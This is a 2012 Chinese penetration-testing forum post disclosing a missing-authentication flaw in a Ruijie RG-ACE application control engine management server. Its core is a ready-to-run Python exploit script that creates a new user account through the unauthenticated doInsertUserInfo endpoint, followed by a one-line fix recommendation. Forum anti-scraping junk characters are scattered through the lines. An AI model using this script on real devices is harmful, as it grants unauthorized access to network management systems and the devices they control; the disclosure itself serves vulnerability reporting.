找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2561|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)0 Z% m5 q# S* }8 K" Q1 m/ ^
5 F+ B; Q; J% [9 y* K' O0 J

# ?% X- b" r& [9 O1 w: p测试的具体版本是
' d! i# i- P6 F: W% {; z产品名称: 锐捷应用控制引擎% m) ?2 o+ p/ l% l& X
版本号: 3.1.36.001 TC- W& K% Z- r+ t7 m& r
编译时间: 201104291730! \7 S  E7 Q2 `) \2 r+ ?* A

, n# c$ X7 c& ]! p( E9 U8 x( F
, y  s2 I" n6 l- g4 d, m漏洞证明:) [8 e& O' ]% B) _; J' g
. R6 c4 c2 T9 l

, u& e2 |. z9 T& p2 W  V  Y' D4 @2 \. p4 r! R" [* C8 M
* T, i! _/ m+ i7 ~8 W+ u
) m  g- A4 N8 b
; ]- P3 x7 B, R" x4 y
执行脚本
$ O: w) w6 t9 R, b& g. C, b#! /usr/bin/env python
0 H- p% J+ z; a! f, p( T9 I#coding=gbk& c1 x+ Q. l! |  w
#RG-ACE管理服务器 V3.1.36.001
/ Q0 K( F4 d8 C7 O7 X  himport urllib2, urllib,cookielib
" Z4 _- \# x+ t7 }url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
1 s# Q( W0 p) |4 N' S, a7 Zopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))9 q  P  W  \8 z
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]# k) J0 K4 w% \; U8 J
post=(("event","userManager.doInsertUserInfo"),+ F2 b; T5 `; V, C$ L1 j+ Z
("useractionname","addButtonValue"),
5 ]& l  T/ m* e9 j9 O2 W& U5 g& u("useropermanager","userManager"),
9 R5 l4 O6 c% ^# ?5 K("userName","t"), #######账号自己加. F3 B% l7 e  d& z. Q$ m5 |  E
("pwd","aaaaaa"),######密码自己加
8 r2 T: y3 t+ a6 v! l' [. D( T("trueName","ad"),+ F5 Q$ M  q& g) ~3 e+ A/ E
("email",""),
3 G# d3 q$ `2 k* H5 z$ i("mobilePhone",""),
' k' F3 V) r$ m* l("officePhone",""),: t! c6 }7 _1 P# l" f4 L- j% s6 @. `
("addr",""),8 V8 {$ o! w6 F: ?$ P& `! }
("submit","确定"))' z( u5 Z, R( B( f0 y' r
urllib2.install_opener(opener)+ u1 {5 o, K; w) H3 u- r
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
8 Y, e% y* u0 Rprint "Done"
; k- i# O2 h+ g1 h2 O" B% Y1 {! [5 [3 W' _  V, G/ P
登录,连接设备
0 H: U$ p+ d4 p* ]! p$ @* t
) J9 Q; H6 a0 C) {5 }0 e
6 ^, P9 w# x% g& z5 f! t! E% o8 H: `3 x; \! W& K0 P( J

0 a( C. z7 ?& U6 u3 o, p4 C: K$ t+ P
默认的管理员admin权限更大点
8 W5 o  o( c, t4 [1 L9 _
0 r  T3 e1 k; W/ r" J1 [5 S  M  `+ g  ?: I- ^' S

1 W3 V3 u% S! V9 P. W& B
8 c+ N9 n$ m6 Y) m
3 L3 c5 c7 D6 @6 d' ?修复方案:, d* P+ W! e+ I: W- s
加强对接口的权限验证5 x3 C% I0 i; C; x& C2 s) J; N

. |. g0 ]% C- z: s3 I% S  k
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表